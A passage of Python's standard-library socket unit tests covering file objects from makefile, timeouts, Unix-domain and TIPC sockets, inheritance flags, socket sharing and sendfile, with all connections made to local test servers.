self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = support.get_socket_conn_refused_errs()
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
try:
socket.create_connection((HOST, 1234))
except socket.timeout:
pass
except OSError as exc:
if support.IPV6_ENABLED or exc.errno != errno.EAFNOSUPPORT:
raise
else:
self.fail('socket.timeout not raised')
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('127.0.0.1' if sys.platform in ("OpenVMS") else '', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS fails')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
@unittest.skipIf(sys.platform == 'OpenVMS', 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
support.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules")
except (FileNotFoundError, IsADirectoryError, PermissionError):
# It's ok if the file does not exist, is a directory or if we
# have not the permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS get_inheritable does not work?')
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0: means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking socket
# since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(MAIN_TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
